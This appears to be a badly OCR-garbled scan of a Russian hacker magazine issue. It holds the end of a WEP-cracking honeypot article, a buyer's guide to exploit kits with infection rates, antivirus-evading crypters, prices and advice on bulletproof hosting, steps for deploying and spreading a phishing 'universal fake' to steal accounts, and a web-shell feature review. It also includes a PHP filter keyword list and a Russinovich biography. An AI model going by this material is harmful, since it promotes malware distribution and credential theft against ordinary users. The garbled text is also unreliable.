попробовал явно указать программе настоящий ключ и попытать- 
ся взломать дамп (аігсгаск-пд - б ХХ:ХХ:ХХ:ХХ:ХХ:ХХ:ХХ:ХХ:ХХ:ХХ: 
ХХ:ХХ:ХХ). Результат был плачевным — 450.000 пакетов не хва- 
тало, чтобы найти в них настоящий ключ! Повторив эту команду 
100 раз, я выявил следующее: аігсгаск находит настоящий ключ 
в комбинированном дампе (если его указать явно; то есть, если 
он знает заранее) в 9 случаях из 100. Результат свидетельствовал 
только об одном — продвинутый статистический анализ аігсгаск’а 
попался на обманку. Да, аігсгаск-пд очень чувствителен к концу 
дампа. Таким образом, ложный ключ, внедренный в легитимный 
эфир, станет хорошим семафором для 105. Можно заворачивать 
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ключом — значит, он его сломал и никакими другими 
методами получить не мог, а поэтому закон уже нару- 
шил] в специальную подсеть, изучать, триангулиро- 
вать и прочее-прочее-прочее. 



^ігсгаск: ложный ключ шифрования найден!] 



Н ИСПОЛЬЗОВАНИЕ НА ПРАКТИКЕ 

Ну что, товарищ админ, будем делать с нашими наблю- 
дениями? Конечно, попытаемся использовать в своей 
старой беспроводной сетке! Можно, например, заюзать 
старый 486-й компьютер с беспроводной картой для 
разбрасывания ложного трафика. Вариант покрасивее 
и подороже — беспроводная НЗВ-сетевуха. Ее можно 
подключить к иЗВ-порту точки доступа (есть практи- 
чески во всех современных ѴѴіРі- роутерах] и немного 
поковыряться со сборкой дров под ЬизуЬох. В итоге 
получим второй беспроводной интерфейс. Теперь 
подумаем, откуда взять этот самый ложный трафик. К 
примеру, реально нагенерить дампов с пакетами и, как 
на магнитофоне, прокручивать циклом в эфире. Файлы 
получатся объемные, так что надо будет еще купить 
флешку и подключить к нашей точке. Как проигрывать 
дампы в эфир — ты уже, наверное, догадался: все тем 
же аігсгаск-пд. В его состав входит очень полезная для 
насутилита аігеріау, которую взломщики применяют 
для атактипа деаутентификации (чтобы заставить точку 
выдавать больше пакетов]. Запускаем наше ложное 
вещание из файла опцией «-г Іакебитр.рсар» и едем 
дальше. 

Полезным будет регулировать зону вещания нашего 
ложного трафика. Это делается опцией Іхроѵѵег в команде 
іѵѵсопбд. Мощность задается в децибелах (іѵѵсопбд е1:Ы 
Іхроѵѵег 1 5] или в милливольтах (іѵѵсопбд еіЫ Іхроѵѵег 
ЗОтѴѴ]. Крометого, рекомендую изучить и поиграться с 
опциями зеп5, г1:5,1'гад, и роѵѵег— поможеттебе создать оп- 
тимальную схему вещания. На базе этого же оборудования 
можно развернуть 105 и специальную подсеть с повышен- 
ной чувствительностью ведения логов. Приложив минимум 
усилий, мы получим высококачественный бопеуроЕ Только 
не следуетзабывать о наших клиентах. После всех настроек 
и твиков надо обязательно понаблюдать какое-то время 
за работоспособностью легитимных пользователей. При 
возникших проблемах стоит посидеть с крбитр’ом и по- 
нять, на каком этапе и как именно пользователю помешал 
ложный трафик. Не забывай про типы пакетов — взломщик 
с большой вероятностью не будет изучать каждый пакет, а 
кракер съест все, что ему предложат. 



Н ЛОМАЙр ЧТОБЫ ЗАЩИТИТЬ 

На понятном языке, без низкоуровневыхтерминов фрейм, IV 
и прочего, я попытался рассказатьо слабостяхеовременных 
статистических методов взлома ѴѴЕР. Впрочем, все мы знаем, 
что за 128-битным ключом скрывается 104 реальных бита, а 
за 64-битным — 40 реальных и так далее. Статья не претенду- 
ет на инструкцию или даже методику по защите. Это всего-на- 
всего рассказ о моих наблюдениях и экспериментах. 

Лишний раз напомню — не надо принимать «на веру» 
совершенство отлаженных и проверенных всем миром 
программ. Во всех, даже самых стойких продуктах, можно 
найти недочеты. Хороший взломщикне должен дрейфить, 
когда безотказный прежде инструмент дает сбой. Ведь 
это просто лишний повод изучить цель более глубоко и 
не попасться в хитроумно расставленные капканы. Здесь 
рассмотрены только пассивные атаки, а в случае, если 
хакер будет использовать внедрение фреймов или другие 
методы, схема должна претерпеть некоторые изменения. 
Если будут вопросы или идеи — всегда готов обсудить их в 
моем блоге охоб. ги. пг 




> Ііпкз 

• аігсгаск-пд. огд 
— страница набора 
утилитаігсгаск. 

• ѵѵерІаЬ.зоигсеФгде 
пеі — сайт програм- 
мы ѵѵерІаЬ. 

• охоб.ги — мой блог. 
Жду комментариев, 
отвечу на вопросы. 



Рпции командной строки ѵѵерІаЦ 




• ууѵѵу^дсск. 
Ш-багппзІабЕбе/ 
аігсгаск-ріѵѵ — опи- 
сание атаки РТѴѴ. 

• аігсгаск-пд. огд/ 
боки.рЬр?іб=[іпк5& 
□окиѴѴікі^б63б97е 
П6сабсбЬ9е1281е 
83б4е5875#1:есЬпід 
ие рарегз — сборник 
ссылок на все сущес- 
твующие атаки ѴѴЕР. 
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Трафик всегда востребован на рынке хак-услуг. Объясняется это просто: он 
позволяет осуществлять загрузки ботов, а боты, в свою очередь, позволяют... 
ну, ты понял. Проблема в том, чтобы грамотно воспользоваться имеющимся 
количеством трафа, а именно — превратить его в п-ное число загрузок. Как? 
Разумеется, с помощью мега-функциональной связки сплойтов. 



ляначала— ликбез (если ты регулярно читает и 
варишься в теме, как в собственном соку, можешь смело 
пропускать ближайшие два абзаца). 

Итак, связки представляют собой набор сплойтов под 
различные уязвимости (ОС, браузер, и т.д.), позволяющие загрузить 
и запустить на компе юзера нужный нам софт. Установив связку 
сплойтов у себя насервереи направив полинку пользователей, мы 
получим загрузки, а именно — определенное число зараженных 
компов, на которые был загружен наш ехе’шник. Количество протро- 
ян енных юзеров напрямую зависит от качества связки и свежести 
используемых в ней сплойтов. На основании статистики загрузок 
высчитывается та к называемый «пробив связки» — про цент за- 
раженных машин от общего числа пользователей, перешедших по 
твоемулинку. Проще говоря, чем выше пробив, тем лучше связка. 
Заманить потенциальных жертв на связку можно либо спамом, либо 
при помощи вставки йгате-кода, содержащего линк на сплойт, в 
контент поломанного ресурса. 

Как видишь, все довольно просто. Однако приобретение связки 
требует немалых затрат (цены варьируются от нескольких сотен до 
несколькихтысяч американских президентов). Дабы облегчитьтебе 
жизнь и сохранить в целости твой кошелек, я решил внимательно 
изучить рынок связок на сегодняшний день. 

В ЧТО И ПОЧЕМ? 

Я постараюсь максимально подробно описывать связки, руководст- 
вуясь следующими параметрами: 

1 . Сплойты, используемые в связке 

2 . Пробив 

3 . Функциональность админки 

4 . Поддержка продукта 

5 . Стоимость 



Начнем, пожалуй, с одной из самых популярных и доступных связок 
— Ріезіа. На данный момент последняя версия продукта — 2.4, так 
что речь пойдет именно о ней: 

• в основе связки лежат 7 сплойтов различной давности, 
включая АсгоЬаб <= 8.1.2 

• Пробив Ослика 4/5/6 версии в среднем 30% 

• Пробив Оперы версий ниже 9.2 порядка 15% 

• Простенькая админка (стата по ОС/браузерам/странам) 

• Официальная цена — $7 0 0 

От себя добавлю, что пробив на миксе (неотфильтрованном трафи- 
ке) составляет более 30%, что, в принципе, приемлемый результат. 
Но связка перестала обновляться, а выход новой версии регулярно 
откладывается. Так или иначе, продукт вполне работоспособен. Что 
будет дальше — время покажет :). 

Следующий гость студии — связка «Опірие Раск» версии 1.1 Рои. 

В состав связки входят такие сплойты, как: 

1 . МВАС (модифицированный) 

2. РВР ѴІЗ — двойной РВР-сплойт старой и новой версии 
(ѵ.8.1.1 + V. 8.1.2) 

3 . М3 ОРРІСЕ ЗМАРЗНОТ 

4 . ІЕ 7 ХМВ ЗРВ - ХМВ сплойт для ІЕ 7 

5 . ЕЕ ЕМВЕВ 

• Пробив на миксе — более 3 0% 

• Удобная админка 

• Цена базового комплекта — $600 + $100 
за апдейт 

Следует отметить встроенный криптор и наличие шифрования 
сплойтов. 




► 068 
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Админка связки АгтІІайИ 



І€рСІЦ ОС 
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Ё5Л0М 



■ым снстемаы :: 



запросов 



загр^ток 



пробив 



дервы»15пгра«: 



запросов 



загрузок 



пробив 



пробиты# ^ауэеры : 



запросов 



затр>"юк 



пробив 



оотав статпстшка : 



запросов 



загрузок 



пробив 

% 

»0 

% 



% 



первые 15 р#фер#ров : 



посститсястт 



ггагосткка по ЭАЖП.іотам :: 



ІГезІа 



Перейдем к связке под названием 6-Раск: 

• Пробив на ру-трафике около 30% 

• Пробив ІЕ <= б версии, отсутствует поддержка ІЕ 7 

• Простота в установке и настройке 

• Криптор, позволяющий обходить антивири с обновленны- 
ми базами 

• Ценник — $10 0 

Сразу скажу: связка представляет собой довольно простой вариант, 
предназначенный в основном для ру-трафика. Выжать какой-либо 
процент загрузок с буржуйского трафа можешь даже и не пытаться 
— не пройдет :]. 

Рассмотрим еще одну известную связку с похожей начинкой — Ісе- 
раск. Она обладает рядом полезных возможностей: 

• Криптор сплойтов 

• Блокировка по ІР 

• Возможность загрузки файлов через админку 

• Встроенный Ібр-чекер и ІРр-ифраймер 

• Фильтрация трафика по странам и браузерам 

• Возможность перенаправления ненужного трафа (в том 
числе, с использованием фильтрации) 

• Наличие системы распределения загрузок (например, 
для каждой страны — отдельный ехе'шник) 

• Стоимость — $200 

Связка отличается расширенным функционалом админки, который 
весьма и весьма приятен в работе. Лично мне доводилось использо- 
вать продукт лишь в качестве теста, и он показал, что для отборного 
СЗА-трафика связка малопригодна. Тем не менее, можешь запросто 
использовать ее, например, под азиатский траф. 

Теперь перейдем к более дорогим и функциональным образцам. 
Номер один в списке -«Іпі'есіог Ьу хоб». На момент продажи связка 
обладала такими атрибутами: 



держкой контрольной суммы 

• Блокировка по ІР 

• Учет инсталлов 

• Встроенный в переполняющие эксплойты алгоритм уда- 
ления забитой памяти. Это обеспечивает более быстрое 
срабатывание сплойтов 

• Невидимость для антивирусов 

• Распределение наборов сплойтов в зависимости от ОС, 
браузера и наличия загрузки 

• Автоматическое предотвращение повторных загрузок 

• Возможность повторного использования трафика путем 
дальнейшего перенаправления 

• Четыре способа оптимизации при работе сплойтов и ве- 
дении статистики: 

• Использование ЗОЕ 

• Использование ТЕХТ ВВ 

• Использование упрощенного ТЕХТ-режима 

• Выключение статистики 

• Три различных админ-панели для каждого вида статис- 
тики и оптимизации 

• Удобный инсталлер и админка 

• Возможность загрузки файлов через админку 

• Наличие множества фильтров статистики в админке (по 
странам, браузерам, ОС и т.д.) 

• Цена на момент продажи — около $100 0 

Нужно сказать, связка собрана действительно грамотно. И дело 
даже не в используемых сплойтах, а в удобной системе управления 
трафиком. Она позволяет отфильтровывать и перенаправлять траф 
по своему усмотрению. Проблема лишь в том, что разработчика 
творения давно не видно, а связка продолжает лежать без апдейтов. 
Зато есть надежда, что и цена, скорее всего, упадет :). 

Настала очередь связки Меозріоб-З, о которой ты, наверняка, слы- 
шал, но, возможно, не видел. Этот зверь обладает таки ми функция- 
ми, как: 



• Подробный мануал по настройке и использованию 

• Возможность использования системы без установки до- 
полнительных РНР-модулей 

• Шифрование сплойтов полиморфным алгоритмом с под- 



• Анализ ОС, браузера и установленного на компе жертвы 
ПО перед выдачей сплойта. Как результат — наибольшая 
вероятность срабатывания (увеличение пробила) 

• Шифрование сплойтов в режиме реального времени, не- 
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ВОЗМОЖНОСТЬ дешифровки з аѵазсгірр-кода стандартными 
средствами 

• Блокировка повторной загрузки ехе' шпика (по дефол- 
ту — на 1 час) и блокировка повторного срабатывания 
связки. В случае обнаружения каталога с ехе-файлом на 
сервере, юзер имеет возможность слить ехе ' шник лишь 
один раз в течение установленного времени — и только 
со своего ІР 

• Наличие в админке статистики по сплойтам и статис- 



тики по загрузкам, а также стата по ОС, браузерам, 
странам и реферерам 

• Определение уникальности загрузки по ІР (вплоть до 
обнуления статы) 

• Поддержка мультиюзерности . Можно создавать акка- 
унты, устанавливать каждому индивидуальный лоадер и 
ехе ' шпик . Раздельная статистика по каждому пользова- 
телю связки 

• Система распределения трафика (например, по странам) 

• Пробив ІЕ и РігеРох последних версий 

• Цена на момент написания статьи — около $1500 



Как видишь, связка имеет массу дополнительных возможностей и 
приспособлений. Увы, ной этот продукт со временем перестал под- 
держиваться должным образом. В результате — о каком-либо точном 
проценте пробива говорить не приходится. Тем не менее, практика 
показывает, что даже из «бывалых» связок можно выжать «чуть- 
чуть» на определенном трафе :). 

Н СИСТЕМЫ УПРАВЛЕНИЯ ТРАФИКОМ 

Большую роль при работе с загрузками играют нетолько связки, но и 
системы управления ѵѵеЬ-трафом. Поэтому советую обратить внима- 
ние на продукт под названием «Зиіга Т05». Эта профессиональная 
система представляет широкий спектр возможностей: 
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• Возможность вести статистику по заданному пользова- 
телем параметру 

• Обіцая статистика по всем схемам 

• Удобный экспорт /импорт настроек схемы в текстовом 
формате. Возможность массового импорта 

• ВРТТМЕ ВОТ — модуль для слежения за доступностью 
ВКР'ов. Если ВКР ссылается на страницу, которая недо- 
ступна (код ответа 4** или 5**) , то ВРТІМЕ ВОТ авто- 
матически блокирует этот ВКЕ (чтобы не терять трафик) 
или заменяет его на альтернативный ВКР 

• ВРТІМЕ ВОТ — фильтр по содержанию страницы — если ВКР 
ссылается на страницу, которая не содержит определен- 
ного текста в теле, то ВРТІМЕ ВОТ автоматически блоки- 
рует этот ВКР или заменяет его на альтернативный 

• ВРТІМЕ ВОТ — статистика недоступности урлов 



• Два способа распределения трафика по ВКР'ам: 

1. Весовое распределение (процентное) 

2. Последовательное распределение (по порядку ВКР'ов) 

• Поддержка нескольких независимых схем распределения 
и групп 

• Поддержка нескольких способов перенаправлений 

• Поддержка множества разнообразных фильтров на любой 
вкус : 

1. по странам (используется внутренняя база СеоІР) 

2. по городам / штатам (при наличии базы) 

3. по типу соединения (модем/ локальная сеть) 

4. по уникальным ІР 

5 . по наличию или отсутствию НТТР_КЕЕЕКЕК 

6 . по содержимому НТТР_КЕЕЕКЕК 

7 . по ІР-сетям и отдельным ІР-адресам 

8 . возможность самостоятельно создавать фильтры 

• Подробная статистика по трафику для каждой схемы и 
каждого урла: уники / неуники / прокси / реферы / по 
трекерам / по странам / браузерам / дням / часам 



Стоит система порядка $100, что вполне приемлемо для подобного 
продукта. Особое внимание также следует уделить серверу, на кото- 
ром будет располагаться твоя связка. 

Нив коем случае не пользуйся услугами обычных хостингов! Как 
правило, такие аккаунты закрывают в течение 2-3 суток, а то и 
быстрее. Лучше всего пользоваться услугами соответствующих 
абузных сервисов и не беспокоиться по поводу доступности твоего 
ехе’шника :). 

Н НЕ ДАЙ СЕБЯ ОБМАНУТЬ 

Если заметил, то на разных связках пробив варьируется в пределах 
какого-либо процента. Связано это, прежде всего, с качеством тра- 
фика. Одна и та же связка можетзапросто показывать пробив 50% на 
ру-трафе и не более 20% — на Н5А. 

Причина кроется в свежести сплойтов и наличии соответствующих 
заплатоку юзеров. Так что, перед покупкой связки рекомендуется 
сделатьтест, скажем, на 1 -2к твоего трафика. 

В большинстве случаев это убережет тебя от лишних затрат. 

Будь внимателен при выборе продукта, и достарайся не дать себя 
обмануть. 
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Трафик нужен всем и всегда. Если утебя в 
наличии имеетсятраф, ноты незнаешь, как 
его реорганизовать, — «Абѵапсеб Тгаі'бс Оігесі; 
5у5І;епп»тебя однозначно заинтересует. Утила 
представляет собой систему распределения 
трафика (ака Т05), и она как раз предназначена 
для решения подобных задач. Если коротко, то 
речь идет о таких возможностях, как: 

• Неограниченное число схем разбие- 
ния трафика, а также гибкая система 
управления редиректами 

• Определение стран и реферов посе- 
тителей (используется база СеоІР) 

• Определение уникальности посети- 
телей (на основе ІР и соокіез) 

• Возможность автоматического сле- 
жения за доступностью каждого НКН в 
системе. Это обеспечивает сохран- 
ность трафика 

• Два вида правил для редиректа: 

1 . Ргітагу- правила : процентное разбие- 
ние, при котором трафик распределяется 
в процентном соотношении по липкам 

2. Зесопбагу-правила : распределение 
порций трафика по времени, то есть 
для каждого линка задается временной 
интервал работы 

Конфигсистемы (сопІд.рЬр) содержит основ- 
ные настройки Т05. Их необходимоуказать при 
инсталляции: 

• $изеСгоп (Оп/Обб) — включение/вы- 
ключение функции запуска крона 



• $и8еикьСгоп (Оп/Обб) — проверка 
доступности ЛИНКОВ; в значении «Об б» 
икьз ни при каких условиях прове- 
ряться не будут 

• $С1іескикьтітеОиб — максимальное 
время ожидания в секундах, после 
которого, в случае отсутствия отве- 
та, ресурс считается недоступным. 
Дефолтовое значение = 5 секунд, од- 
нако, ты можешь указать его самосто- 
ятельно 

• $0рбітІ2еТаЫе8 (Оп/Обб) — включе- 
ние/выключение функции оптимизации 
таблицы БД во время запуска. Реко- 
мендуется регулярно проводить опти- 
мизацию таблиц, — в противном случае 
производительность ТВЗ постепенно 
будет уменьшаться 

• $ВоСгопЬод (Оп/Обб) — включение/ 
выключение легирования работы крона 

• $Раз80иегу8бгіпд (Оп/Обб) — оп- 
ределяет, передавать ли параметры 
запроса к скрипту оиб.рДр (который 
отвечает за передачу параметров каж- 
дому из иКБ'ов) при редиректе 

• $ѴізиаІТіте0ббзеб — визуальное сме- 
іцение времени скрипта от времени серве- 
ра. Определяет, насколько время, отоб- 
ражаемое в скрипте, будет отличаться 
от времени сервера. Можно изменять эту 
настройку, если сервер находится в дру- 
гом часовом поясе — работать , конечно , 
удобнее по местному времени 

С конфигом разобрались. Теперь перейдем к 
разделу «Зеиіпдз», в котором находятся основ- 
ные настройки тулзы: 

• Ыеѵ7 Раззѵ70гб, Сопбігт Раззѵ/огб 

— смена пароля к админке для текуіце- 
го пользователя 

• Аібегпабіѵе икь — ІІКЬ, на который 
идет весь трафик, если по каким-то 
причинам БД недоступна 

• РабЬ Ьо ОеоІР — путь к СеоІР, на- 
пример , /изг/1оса1/Ьіп/деоір1оокир . 
Если параметр задан неверно — страны 



всех посетителей определяются как 
ІЗтікпоші 

• Заѵе биіі збабз — время, за которое 
необходимо сохранять полную статис- 
тику о входяіцем трафике 

• СЬеск икьз — функция проверки 
БКБ ' ов на доступность через указан- 
ное число минут . На не доступные в 
данный момент БКБ'ы трафик перена- 
правляться не будет 

Все достаточно просто. Но при работе с систе- 
мой порой возникают ошибки. Вот л ишь часть 
из них, — плюс возможные способы решения: 

1 . Сап 'б ореп бііе: ' бЫ_пате . МУВ ' — 
ошибка обраіцения к таблице бЫ_пате 
из-за чрезмерных нагрузок на мускул. 
Есть два пути решения проблемы: 

a) Залогиниться в мускуле и выпол- 
нить команду КЕРАІК ТАБЕЕ бЫ_пате 
(где бЫ_пате — название нужной 
таблицы) 

b) Боспользоваться утилой гераіг.ркр 
( . /г_абтіп/боо1з/гераіг . ркр) , пред- 
назначенной для устранения подобных 
ситуаций 

2 . Бее посетители определяются со 
страной «Впкпоѵ^п» — проблема за- 
ключается в отсутствии СеоІР, либо 
путь к директории СеоІР, указанный в 
разделе Зеббіпдз неверен 

3 . Не изменяются настройки в разделе 
Зеббіпдз — скорее всего, нет прав на 
запись либо в файл . /г_абтіп/сопбід/ 
сопбід.ркр, либо в каталог, в кото- 
ром он находится 



ІіІДДіЛЛаіДИ РЕдЕсикЕ моруіе 

ЯЯ*МІХ/ѴІМ 

иаыд мцр. СРЕЕМ_ВЕАР АМР ѴІМУХ 

Еслиіы работаешьадмином или просто дер- 
жишь собственный веб- ресурс, то наверняка 
тебя тревожитего безопасность. Полистав 
подшивку нашего журнала, легко убедиться 
— уязвимости появляются каждый день, втом 






ІКонфиприруем модуль безопасности! 



числе и в РНР-скриптах. Глотать валидол после 
очередной вовремя поставленной заплатки 
бесполезно, никакой гарантии на завтрашний 
день нет. А вот надежда, все-таки, есть. Имя ей 
— ОГзесиге тосіиіе. Это бесплатный модуль, 
обеспечивающий безопасность при работе 
любого рбр-скрипта. Тебе лишь необходимо 
сделать и нклуд модуля в РНР-скрипт, — и тулза 
сама отследит и залогирует все потенциально 
опасные обращения кскрипту. 

Функциональная часть модуля выглядит следу- 
ющим образом: 

• Парсер логов апача 

• Авторизация по сессии 

• Возможность бана по ІР-адресу 

• Наличие механизма защиты от ХЗЗ- 
атак 

• Обнаружение потенциально опасных 
ЗОН-запросов 

• Механизм защиты от эксплуатации 
інсіибе- багов 

• Наличие защиты от ВВоЗ-атак 

• Функция просмотра логов доступа по 
ббр- и ззП-протоколам 

• Возможность отключить логирование 
атак и активности скриптов 

Все фильтруемые значения, используемые в 
механизме защиты отХ55/50Г/1МСиЭ0Е-уяз- 
вимостей, содержатся в скрипте ѵагіаЫез.рбр: 

$Ьаб_зр1 = аггау ( "иніон», "зеіеср" , " 
бгот" , "ѵ^Пеге" , "інзегб" , " ог " , " анб 

$Ьаб_інс1ибе = 

аггау ( "ПбРр .рПр" , " . 
рПРтІ " , " . рПрЗ " , " . р1ір4 
р]тр5 " , ) ; 

$Ьаб_хзз = аггау ( "<зсгірр" , "босите 
нб . соокіе " , " ^ аѵазсгірб 

Указанные значения ты можешь без проблем 
отредактировать вручную. 

ІіІіЫІДЛДІДИІ РОМСНІК^д иМІѴЕРЗАІ 
ГАКЕ 

ИЯ*мім /ѵім 

ООБЭрогчснік 



рисуем фейки :| 




О фейках писалось много и не раз. Оно и понят- 
но — грамотный фейк крупного портала всегда 
в цене. Помнится, я даже выкладывал несколь- 
ко интересных вариантов вХ-Тулз (полистай 
подшивку^-^). У стандартного метода создания 
фейков (при котором информация с оригиналь- 
ного сайта копируется на скам) недостаток 
заключается в трудоемкости процесса, а также 
втом, что не отслеживаются изменения на 
родительском портале. На деле, качественный 
фейк всегда требовал доработок и изменений 
(не говоря о потраченныхусилиях). Невольно 
начинаешьзадумываться: «Ачто, если бы су- 
ществовал универсальный фейк?». Спешутебя 
обрадовать, универсальный фейк действи- 
тельно есть, причем, лежит он на нашем ДВД 
— под названием «РопсЫк’з ипіѵегзаііаке» 

:). Какможно понять из названия, автором 
утилы является некий РопсЫк, которого мы 
и благодарим за написание скрипта. Итак, от 
тебя требуется: 

1 . Раздобыть сервер/хостинг 

2 . Залить файлы из архива на сервер 

3 . Выставить соответствующие права 

на лог-файл и конфиг 

Далее: 

1 . Заходим на скрипт фейка 

2 . Заполняем все необходимые поля 

3 . Получаем линк на готовый фейк 

4 . Распространяем полученный линк 

среди потенциальных жертв : ) 

Система работы универсального фейка доста- 
точно проста. Пройдя по ссылке, юзер попадет 
на фейк. Скрипт фейка чекает ввод пользова- 
тельских данных (ака заполненных формочек) 
и записывает данные в лог, а пользователя 
автоматически редиректит на страницу входа 
оригинального сайта, адрес которого указывает 
в настройках. В результате, утебя чужой акка- 
унт, а у пользователя — никаких подозрений... 

ІІІДД^ЛЛДІДИІНІАЗМ 

ЯН1У1МР0Уд2000/ХР 

иаыд ніАдмдтцрю 




|(онсД1 ^Р^м гД/іложеніД 

Чтобы автоматизировать процессы, которые 
сложно выполнить вручную, приходится писать 
всевозможные перл/РНР-скрипты, набрасы- 
вать простенькие сорцы на С/С++, и все — ради 
одноразового использования! Отнынеты мо- 
жешь неутруждать себя написанием рутинных 
скриптов. За тебя будет работать прога под на- 
званием «НіАзпп». Это конструктор программ, 
выполненный в виде системы визуального 



проектирования и разработки приложений. 
Причем, при работе с софтиной нетребуется 
знания каких-либо языков программирова- 
ния. Утила все сделаетсама. Тебе лишь нужно 
определиться сзадачей и грамотно собрать 
«конструктор», получив, в итоге, готовую прогу. 
Для написания сложных проектов продукт вряд 
ли подойдет(оптимизация хромает), но при 
решении тривиальных задач, пожалуй, лучше 
инструмента не найти. 

В общем, сливай прогу с нашего ДВД и пробуй, 
утебя все получится :). 



ІПРОГРАММА: 



іаа*ніх/ѵігч 

иаыд орв 




кциональный ѵѵеЬ- збеЦ 



Та к уж сложилось, каждый раз в рубрике я 
выкладываю по новому веб-шеллу. Прогресс 
не стоит на месте, и порой встречаются 
интересные скрипты. Следующая утила, 
которую я хочу представить, — ѵѵеЬ вбей Ьу 
оВЬ (сокращенное название — ѴѴ50). Качест- 
венный веб-шелл, как известно, должен быть 
удобным, функциональным и небольшим 
по размеру. ѴѴ50 как раз соответствует этим 
требованиям :). Размер скрипта составляет 
порядка 16 Кб, а среди функциональной 
части отметим: 

• Наличие авторизации 

• Получение информации о сервере 

• Встроенный файловый менеджер 

• Встроенный ЗСВ-менеджер 

• Создание, удаление, редактиро- 
вание, просмотр, аплоад, закачка, 
переименование , изменение даты моди- 
фикации файлов 

• Создание, просмотр, переименова- 
ние, удаление каталогов 

• Все параметры передаются только 
РОЗТ-методом 

• Выполнение произвольного РНР-кода 

• Работа со строками 

• Поиск хешей в онлайн-базах 

• Выбор кодировки, в которой работа- 
ет шелл 

• Обход Забе-тобе (чтение файлов, 
листинг каталогов) 

• Встроенный РТР /МуЗОВ- брутер 

• Виндшеллы на С/Рег1 

• Функция самоудаления 

Крометого, эта версия веб-шелла рассчи- 
тана исключительно на *піх-системы. Если 
верить автору, то под Винду нам следует 
ожидать отдельный, не менее функциональ- 
ный, релиз :). ~*=Г 
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ЕДИНСТВЕННАЯ В РОССИИ 
НАРОДНАЯ ПРЕМИЯ В ОБЛАСТИ 
КОМПЬЮТЕРНЫХ И ВИДЕОИГР 



■ 

■■■■■■«ЛМЕШІІР 




ГОЛОСОВАНИЕ СТАРТУЕТ 
1 ЯНВАРЯ 2009 ГОДА 

ЛУЧШИЕ 
ПРОЕКТЫ 
2008 ГОДА 
ВЫБИРАЕШЬ 



Подробности 

на ѵѵѵѵѵу.датеіагкі-аѵуагсі.ги 




ЛУЧШАЯ 

ЗАРУБЕЖНАЯ 

ИГРА 

Меіаі беаг $оІі(1 4: 6ип$ о! ІІіе Раігіоіз 
Соттапсі & Сопдиег: РѳсІ АІѳгі 3 
ТотЬ Раісіег: ІіпсІегѵѵогІсІ 
Зирег $та$1і Вгоз. ВгаѵѵІ 
Сиііаг Него: ѴѴогІсІ Тоиг 
Сгап(1 Т1іе!( Аи(о IV 
УііІѳВідРІапеі 
Ргіпсе о! Регзіа 
ОеѵіІ Мау Сгу 4 
ЗоиІ СаІіЬиг IV 
Сѳагз 0 ^ ѴѴаг 2 
Міггог '5 Е(1де 
РаІІоиі 3 
ГаЫѳ II 





Генеральный видео 
партнер в сети Интернет 



зтОІгі 



Генеральный 
Интернет партнер 




игры©таіІги® 







ЗНАТОК ИЗНАНКИ ОПЕРАЦИОННЫХ СИСТЕМ 



|Ни у нас, ни на западе не наРлюдается нехватки талантливых программистов.! 
|щнак^подеі^^татѵс^?ѴРУ>^ред^іш^диницы^^<ак^іірочем^^^ 
ФУГор^оластіЯаіас^астеро^воег^ел^іѴШі^нат^^і^^ 

І п^іменщПіотом^іт^т^ііредеденн^тог^аслуживают^ещ 
ставляіЭТео^ШркО^ѵссиновича^ксперт^і^іаст^ѵііШо^^^і^шіь^ 



ШО 15 МІ5ТЕР Р055ІМ0ѴІСН? 



В процессе работы над статьей мною было сделано странное открытие 
— оказалось, что имя Марка Руссиновича (Магк РиззіпоѵісЬ) большинс- 
твулюдей сегодня ровным счетом ни о чем не говорит. Более всего меня 
поразили двое программеров, которыетоже никогда отаком не слыша- 
ли. Именно после общения с ними стало ясно, что писать о Руссиновиче 
действительно нужно, потому как стыдно, господа, просто стыдно! 

Итак, МаркРуссинович — этоамериканский программисти писатель, 
эксперте мировым именем, один из ведущих специалистов в области 
архитектуры и дизайна операционных систем, а в частности, внутреннего 
устройства ѴѴіпбоѵѵз. В 2006 году он вошел в Тор 5 хакеров планеты, по мне- 
ниюжурнала еѴѴеек, наряду сЖанной Рутковской и Дэвидом Майнором. 
Исходя из перечисленного, нетрудно догадаться, что образованиеу Мар- 
ка самое что ни на есть профильное (впрочем, история знает исключения 



даже втаких сферах) — он выпускникуниверситета Карнеги-Меллона, 
обладатель двух степеней: бакалавра и доктора в области вычисли- 
тельнойтехники. По окончании университета Руссинович и не подумал 
сворачивать с взятого курса, некоторое время проработав в исследо- 
вательском центре корпорации ІВМ (в должности эксперта по операци- 
онным системам). Долго он там не задержался и вскоре отправился в 
свободное плавание. В 1996 году, совместно с еще одним разработчиком 
ПО — Брюсом Когсвеллом (Вгусе Содзѵѵеи), Руссинович организовал 
свое предприятие, получившее имя ѴѴіпІегпаІзЗоІІѵѵаге ІР. Деятельность 
Марка сосредоточилась вокругнаписания различныхігееѵѵагетулз для 
администрирования и диагностики МЗѴѴіпбоѵѵз. Его компания при- 
держиваласьтогоже направления, соднойлишьнебольшой разницей 
— продукция фирмы, где Руссинович долгие годы занимал пост главного 
архитектора программного обеспечения, была уже платной. 
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КооІкііКеѵеаІегв работе 



Свои утилиты Руссинович и коллеги распространяли через сайт 
Зузіпіегпаіз.сот (ранее — пбпіегпаіз), а так как недостатка в идеях они 
явно не испытывали — полезных софтинокза ихавторством насчитыва- 
ется уже более 60 штук. В качестве наиболее известных, пожалуй, можно 
перечислить — Ргосезз Мопііог (ранее — Рііетоп и Редтоп), Ргосезз 
ЕхрЬгег, РооІкііРеѵеаІег и утилиты вроде МТР5005, помогающие в ра- 
боте и, по сути, восполняющие пробелы в «Винде» (так, МТР5В05 дела- 
ет видимыми все МТР5-разделы при работе под М5-В05). Из последней 
полезности вытекает тот простой факт, что Руссинович написал драйвер 
файловой системы МТР5 под 005. Это, конечно, далеко не главная из 
его заслуг, но и не последняя. 

Скачать все эти маленькие приятности можно было как по отдельности, 
таки готовыми набора ми. Напри мер, некогда особенной популяр- 
ностью пользовался пакпод незамысловатым названием ѴѴіпІегпаІз 
АбтіпізІгаЬг Рак. И что особенно интересно, на сайте публиковались 
даже версии для Ыпих, о котором эксперты по ѴѴіпбоѵѵз, как ни стран- 
но, не забывали. А в более поздних релизах появились версии для 
64-битных систем. Словом, все шло хорошо, пока на горизонте не возник 
Місгозо!"!:, великий и ужасный. 

Просто пройти мимо столь талантливых специалистов «мелкомягкие» не 
могли. К2006 году послужной списокѴѴіп1:егпа[з5об:ѵѵаге действительно 
внушал уважение, и на Эузіпіегпаіз можно было найти утилиты на все 
случаи жизни. Сайт предлагал настолько удобные и практичные вещи, 
что даже краткого знакомства с ними хватало, чтобы понять — в ѴѴіпбоѵѵз, 
в самом деле, ощутимо недостает всего этого. 

Закономерным итогом интереса, проявленного МісгозоІС стала покупка 
